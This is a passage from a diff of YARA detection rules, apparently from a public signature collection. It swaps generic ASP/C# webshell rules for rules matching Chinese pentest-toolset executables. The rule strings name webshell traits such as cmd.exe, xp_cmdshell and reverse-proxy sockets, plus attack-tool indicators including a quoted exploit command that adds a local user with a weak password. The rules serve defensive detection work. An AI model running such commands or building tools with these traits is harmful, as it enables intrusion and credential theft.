$asp_much_sus* ) or 1 of ( $asp_gen_sus* ) or ( #asp_gen_obf1 > 2 ) ) ) or ( filesize < 50KB and ( 1 of ( $asp_much_sus* ) or 3 of ( $asp_gen_sus* ) or ( #asp_gen_obf1 > 6 ) ) ) or ( filesize < 150KB and ( 1 of ( $asp_much_sus* ) or 4 of ( $asp_gen_sus* ) or ( #asp_gen_obf1 > 6 ) or ( ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) and ( 1 of ( $asp_much_sus* ) or 2 of ( $asp_gen_sus* ) or ( #asp_gen_obf1 > 3 ) ) ) ) ) or ( filesize < 100KB and ( any of ( $tagasp_capa_classid* ) ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 220KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Generic_Registry_Reader : FILE
+rule SIGNATURE_BASE_CN_Honker_Safe3Wvs_Cgiscan : FILE
 {
 	meta:
-		description = "Generic ASP webshell which reads the registry (might look for passwords, license keys, database settings, general recon, ..."
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "02d6f95f-1801-5fb0-8ab8-92176cf2fdd7"
-		date = "2021-03-14"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L4720-L4867"
+		description = "Sample from CN Honker Pentest Toolset - file cgiscan.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a9f7a195-deb8-5887-bc55-d1b0cac43182"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L343-L358"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4d53416398a89aef3a39f63338a7c1bf2d3fcda4"
-		hash = "f85cf490d7eb4484b415bea08b7e24742704bdda"
-		hash = "898ebfa1757dcbbecb2afcdab1560d72ae6940de"
-		logic_hash = "515bff52bebaad45481202ff934f8d1cbb79c27ccf47ca811077acacb7a47f13"
-		score = 50
-		quality = -53
+		hash = "f94bbf2034ad9afa43cca3e3a20f142e0bb54d75"
+		logic_hash = "990dcede3bb83216af7e72e2a49bc2355ebd45ebd3fc658ba337a285dcdf799f"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$asp_reg2 = "LocalMachine" fullword wide ascii
-		$asp_reg3 = "ClassesRoot" fullword wide ascii
-		$asp_reg4 = "CurrentUser" fullword wide ascii
-		$asp_reg5 = "Users" fullword wide ascii
-		$asp_reg6 = "CurrentConfig" fullword wide ascii
-		$asp_reg7 = "Microsoft.Win32" fullword wide ascii
-		$asp_reg8 = "OpenSubKey" fullword wide ascii
-		$sus1 = "shell" fullword nocase wide ascii
-		$sus2 = "cmd.exe" fullword wide ascii
-		$sus3 = "<form " wide ascii
-		$sus4 = "<table " wide ascii
-		$sus5 = "System.Security.SecurityException" wide ascii
-		$fp1 = "Avira Operations GmbH" wide
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_input1 = "request" fullword nocase wide ascii
-		$asp_input2 = "Page_Load" fullword nocase wide ascii
-		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
-		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
-		$asp_xml_method1 = "GET" fullword wide ascii
-		$asp_xml_method2 = "POST" fullword wide ascii
-		$asp_xml_method3 = "HEAD" fullword wide ascii
-		$asp_form1 = "<form " wide ascii
-		$asp_form2 = "<Form " wide ascii
-		$asp_form3 = "<FORM " wide ascii
-		$asp_asp = "<asp:" wide ascii
-		$asp_text1 = ".text" wide ascii
-		$asp_text2 = ".Text" wide ascii
+		$s2 = "httpclient.exe" fullword wide
+		$s3 = "www.safe3.com.cn" fullword wide
 
 	condition:
-		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and all of ( $asp_reg* ) and any of ( $sus* ) and not any of ( $fp* ) and ( filesize < 10KB or ( filesize < 150KB and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 357KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Regeorg_CSHARP : FILE
+rule SIGNATURE_BASE_CN_Honker_Pr_Debug : FILE
 {
 	meta:
-		description = "Webshell regeorg aspx c# version"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0a53d368-5f1b-55b7-b08f-36b0f8c5612f"
-		date = "2021-01-11"
-		modified = "2023-07-05"
-		reference = "https://github.com/sensepost/reGeorg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L4869-L4979"
+		description = "Sample from CN Honker Pentest Toolset - file debug.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6d759818-b762-56f4-8475-82a7d18a659c"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L360-L375"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c1f43b7cf46ba12cfc1357b17e4f5af408740af7ae70572c9cf988ac50260ce1"
-		hash = "479c1e1f1c263abe339de8be99806c733da4e8c1"
-		hash = "38a1f1fc4e30c0b4ad6e7f0e1df5a92a7d05020b"
-		hash = "e54f1a3eab740201feda235835fc0aa2e0c44ba9"
-		hash = "aea0999c6e5952ec04bf9ee717469250cddf8a6f"
-		logic_hash = "0c68f5955df2e75c3b5b4f1c6398fd57add1f64bfb3d46ccebf1c6767f5d2eb1"
-		score = 75
-		quality = -32
+		hash = "d11e6c6f675b3be86e37e50184dadf0081506a89"
+		logic_hash = "0b7508e3a508adc9416f16549290e06468520c156dbd5192e5a352820586af9f"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$input_sa1 = "Request.QueryString.Get" fullword nocase wide ascii
-		$input_sa2 = "Request.Headers.Get" fullword nocase wide ascii
-		$sa1 = "AddressFamily.InterNetwork" fullword nocase wide ascii
-		$sa2 = "Response.AddHeader" fullword nocase wide ascii
-		$sa3 = "Request.InputStream.Read" nocase wide ascii
-		$sa4 = "Response.BinaryWrite" nocase wide ascii
-		$sa5 = "Socket" nocase wide ascii
-		$georg = "Response.Write(\"Georg says, 'All seems fine'\")"
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
+		$s1 = "-->Got WMI process Pid: %d " ascii
+		$s2 = "This exploit will execute \"net user temp 123456 /add & net localg" ascii
 
 	condition:
-		filesize < 300KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( $georg or ( all of ( $sa* ) and any of ( $input_sa* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 820KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_CSHARP_Generic : FILE
+rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V4_0 : FILE
 {
 	meta:
-		description = "Webshell in c#"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "6d38a6b0-b1d2-51b0-9239-319f1fea7cae"
-		date = "2021-01-11"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L4981-L5089"
+		description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v4.0.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d41cbed5-a6e3-5165-a8c3-e0375c1ed75d"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L377-L392"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b6721683aadc4b4eba4f081f2bc6bc57adfc0e378f6d80e2bfa0b1e3e57c85c7"
-		hash = "4b365fc9ddc8b247a12f4648cd5c91ee65e33fae"
-		hash = "019eb61a6b5046502808fb5ab2925be65c0539b4"
-		hash = "620ee444517df8e28f95e4046cd7509ac86cd514"
-		hash = "a91320483df0178eb3cafea830c1bd94585fc896"
-		logic_hash = "fb367b79c8ed4a61618594db903cf3d70524685d7710d243163958ecb47634aa"
-		score = 75
-		quality = -30
+		hash = "98f21f72c761e504814f0a7db835a24a2413a6c2"
+		logic_hash = "bd6f9b6e831573164fddf7f0188087eb0076410b77c9c06cfacadebe6a53b525"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$input_http = "Request." nocase wide ascii
-		$input_form1 = "<asp:" nocase wide ascii
-		$input_form2 = ".text" nocase wide ascii
-		$exec_proc1 = "new Process" nocase wide ascii
-		$exec_proc2 = "start(" nocase wide ascii
-		$exec_shell1 = "cmd.exe" nocase wide ascii
-		$exec_shell2 = "powershell.exe" nocase wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
+		$s0 = "LOADER ERROR" fullword ascii
+		$s15 = "2011-2012 T00LS&RICES" fullword wide
 
 	condition:
-		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and filesize < 300KB and ( $input_http or all of ( $input_form* ) ) and all of ( $exec_proc* ) and any of ( $exec_shell* )
+		uint16( 0 ) == 0x5a4d and filesize < 2077KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Runtime_Compile : FILE
+rule SIGNATURE_BASE_CN_Honker_Matrixay1073 : FILE
 {
 	meta:
-		description = "ASP webshell compiling payload in memory at runtime, e.g. sharpyshell"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5da9318d-f542-5603-a111-5b240f566d47"
-		date = "2021-01-11"
-		modified = "2023-04-05"
-		reference = "https://github.com/antonioCoco/SharPyShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5091-L5189"
+		description = "Sample from CN Honker Pentest Toolset - file MatriXay1073.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "23e73b89-f60e-5bc3-8974-15be16d7c408"
+		date = "2015-06-23"
+		modified = "2023-01-27"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L394-L412"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e826c4139282818d38dcccd35c7ae6857b1d1d01"
-		hash = "e20e078d9fcbb209e3733a06ad21847c5c5f0e52"
-		hash = "57f758137aa3a125e4af809789f3681d1b08ee5b"
-		hash = "bd75ac9a1d1f6bcb9a2c82b13ea28c0238360b3a7be909b2ed19d3c96e519d3d"
-		hash = "e44058dd1f08405e59d411d37d2ebc3253e2140385fa2023f9457474031b48ee"
-		hash = "f6092ab5c8d491ae43c9e1838c5fd79480055033b081945d16ff0f1aaf25e6c7"
-		hash = "dfd30139e66cba45b2ad679c357a1e2f565e6b3140a17e36e29a1e5839e87c5e"
-		hash = "89eac7423dbf86eb0b443d8dd14252b4208e7462ac2971c99f257876388fccf2"
-		hash = "8ce4eaf111c66c2e6c08a271d849204832713f8b66aceb5dadc293b818ccca9e"
-		logic_hash = "6699a44e396eedebb3bafa0e89c3b6d080586a158ed056ec7220bdf2ad764444"
-		score = 75
-		quality = -6
+		hash = "fef951e47524f827c7698f4508ba9551359578a5"
+		logic_hash = "e64cae48344e5dae8ec80b2897305a0b380340bdd2973eb0828582f18ef8bf2b"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$payload_reflection1 = "System" fullword nocase wide ascii
-		$payload_reflection2 = "Reflection" fullword nocase wide ascii
-		$payload_reflection3 = "Assembly" fullword nocase wide ascii
-		$payload_load_reflection1 = /[."']Load\b/ nocase wide ascii
-		$payload_load_reflection2 = /\bGetMethod\(("load|\w)/ nocase wide ascii
-		$payload_compile1 = "GenerateInMemory" nocase wide ascii
-		$payload_compile2 = "CompileAssemblyFromSource" nocase wide ascii
-		$payload_invoke1 = "Invoke" fullword nocase wide ascii
-		$payload_invoke2 = "CreateInstance" fullword nocase wide ascii
-		$payload_xamlreader1 = "XamlReader" fullword nocase wide ascii
-		$payload_xamlreader2 = "Parse" fullword nocase wide ascii
-		$payload_xamlreader3 = "assembly=" nocase wide ascii
-		$payload_powershell1 = "PSObject" fullword nocase wide ascii
-		$payload_powershell2 = "Invoke" fullword nocase wide ascii
-		$payload_powershell3 = "CreateRunspace" fullword nocase wide ascii
-		$rc_fp1 = "Request.MapPath"
-		$rc_fp2 = "<body><mono:MonoSamplesHeader runat=\"server\"/>" wide ascii
-		$asp_input1 = "request" fullword nocase wide ascii
-		$asp_input2 = "Page_Load" fullword nocase wide ascii
-		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
-		$asp_input4 = "\\u0065\\u0071\\u0075" wide ascii
-		$asp_input5 = "\\u0065\\u0073\\u0074" wide ascii
-		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
-		$asp_xml_method1 = "GET" fullword wide ascii
-		$asp_xml_method2 = "POST" fullword wide ascii
-		$asp_xml_method3 = "HEAD" fullword wide ascii
-		$asp_form1 = "<form " wide ascii
-		$asp_form2 = "<Form " wide ascii
-		$asp_form3 = "<FORM " wide ascii
-		$asp_asp = "<asp:" wide ascii
-		$asp_text1 = ".text" wide ascii
-		$asp_text2 = ".Text" wide ascii
-		$sus_refl1 = " ^= " wide ascii
-		$sus_refl2 = "SharPy" wide ascii
+		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1" ascii
+		$s1 = "Policy\\Scan\\GetUserLen.ini" fullword ascii
+		$s2 = "!YEL!Using http://127.0.0.1:%d/ to visiter https://%s:%d/" ascii
+		$s3 = "getalluserpasswordhash" fullword ascii
 
 	condition:
-		(( filesize < 50KB and any of ( $sus_refl* ) ) or filesize < 10KB ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and not any of ( $rc_fp* ) and ( ( all of ( $payload_reflection* ) and any of ( $payload_load_reflection* ) ) or ( all of ( $payload_compile* ) and any of ( $payload_invoke* ) ) or all of ( $payload_xamlreader* ) or all of ( $payload_powershell* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 9100KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_SQL : FILE
+rule SIGNATURE_BASE_CN_Honker_Sword1_5 : FILE
 {
 	meta:
-		description = "ASP webshell giving SQL access. Might also be a dual use tool."
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e534dcb9-40ab-544f-ae55-89fb21c422e9"
-		date = "2021-03-14"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5191-L5372"
+		description = "Sample from CN Honker Pentest Toolset - file Sword1.5.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "832e4998-64fc-5f34-a46d-aeefde0ee763"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L414-L431"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "216c1dd950e0718e35bc4834c5abdc2229de3612"
-		hash = "ffe44e9985d381261a6e80f55770833e4b78424bn"
-		hash = "3d7cd32d53abc7f39faed133e0a8f95a09932b64"
-		hash = "f19cc178f1cfad8601f5eea2352cdbd2d6f94e7e"
-		hash = "cafc4ede15270ab3f53f007c66e82627a39f4d0f"
-		logic_hash = "c59250065c4be267746f716f922007b638706a76579af6509c8e97d0cee03f33"
-		score = 75
-		quality = -84
+		hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f"
+		logic_hash = "0f7630b2ec983df2a065b049000cef6de38f884254748a342b2fd84d8c5985af"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$sql1 = "SqlConnection" fullword wide ascii
-		$sql2 = "SQLConnection" fullword wide ascii
-		$sql3 = "System" fullword wide ascii
-		$sql4 = "Data" fullword wide ascii
-		$sql5 = "SqlClient" fullword wide ascii
-		$sql6 = "SQLClient" fullword wide ascii
-		$sql7 = "Open" fullword wide ascii
-		$sql8 = "SqlCommand" fullword wide ascii
-		$sql9 = "SQLCommand" fullword wide ascii
-		$o_sql1 = "SQLOLEDB" fullword wide ascii
-		$o_sql2 = "CreateObject" fullword wide ascii
-		$o_sql3 = "open" fullword wide ascii
-		$a_sql1 = "ADODB.Connection" fullword wide ascii
-		$a_sql2 = "adodb.connection" fullword wide ascii
-		$a_sql3 = "CreateObject" fullword wide ascii
-		$a_sql4 = "createobject" fullword wide ascii
-		$a_sql5 = "open" fullword wide ascii
-		$c_sql1 = "System.Data.SqlClient" fullword wide ascii
-		$c_sql2 = "sqlConnection" fullword wide ascii
-		$c_sql3 = "open" fullword wide ascii
-		$sus1 = "shell" fullword nocase wide ascii
-		$sus2 = "xp_cmdshell" fullword nocase wide ascii
-		$sus3 = "aspxspy" fullword nocase wide ascii
-		$sus4 = "_KillMe" wide ascii
-		$sus5 = "cmd.exe" fullword wide ascii
-		$sus6 = "cmd /c" fullword wide ascii
-		$sus7 = "net user" fullword wide ascii
-		$sus8 = "\\x2D\\x3E\\x7C" wide ascii
-		$sus9 = "Hacker" fullword wide ascii
-		$sus10 = "hacker" fullword wide ascii
-		$sus11 = "HACKER" fullword wide ascii
-		$sus12 = "webshell" wide ascii
-		$sus13 = "equest[\"sql\"]" wide ascii
-		$sus14 = "equest(\"sql\")" wide ascii
-		$sus15 = { e5 bc 80 e5 a7 8b e5 af bc e5 }
-		$sus16 = "\"sqlCommand\"" wide ascii
-		$sus17 = "\"sqlcommand\"" wide ascii
-		$slightly_sus3 = "SHOW COLUMNS FROM " wide ascii
-		$slightly_sus4 = "show columns from " wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_input1 = "request" fullword nocase wide ascii
-		$asp_input2 = "Page_Load" fullword nocase wide ascii
-		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
-		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
-		$asp_xml_method1 = "GET" fullword wide ascii
-		$asp_xml_method2 = "POST" fullword wide ascii
-		$asp_xml_method3 = "HEAD" fullword wide ascii
-		$asp_form1 = "<form " wide ascii
-		$asp_form2 = "<Form " wide ascii
-		$asp_form3 = "<FORM " wide ascii
-		$asp_asp = "<asp:" wide ascii
-		$asp_text1 = ".text" wide ascii
-		$asp_text2 = ".Text" wide ascii
+		$s1 = "http://www.md5.com.cn" fullword wide
+		$s2 = "ListBox_Command" fullword wide
+		$s3 = "\\Set.ini" wide
+		$s4 = "OpenFileDialog1" fullword wide
 
 	condition:
-		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and ( 6 of ( $sql* ) or all of ( $o_sql* ) or 3 of ( $a_sql* ) or all of ( $c_sql* ) ) and ( ( filesize < 150KB and any of ( $sus* ) ) or ( filesize < 5KB and any of ( $slightly_sus* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 740KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Scan_Writable : FILE
+rule SIGNATURE_BASE_CN_Honker_Havij_Havij : FILE
 {
 	meta:
-		description = "ASP webshell searching for writable directories (to hide more webshells ...)"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1766e081-0591-59ab-b546-b13207764b4d"
-		date = "2021-03-14"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5374-L5517"
+		description = "Sample from CN Honker Pentest Toolset - file Havij.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b3640a32-b546-58c9-abb1-3da60dc6633c"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L433-L448"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2409eda9047085baf12e0f1b9d0b357672f7a152"
-		hash = "af1c00696243f8b062a53dad9fb8b773fa1f0395631ffe6c7decc42c47eedee7"
-		logic_hash = "80969fd0c27903dabf08a250a47971725ac5762fd2f9afd96167b8f88f277348"
-		score = 75
-		quality = -89
+		hash = "0d8b275bd1856bc6563dd731956f3b312e1533cd"
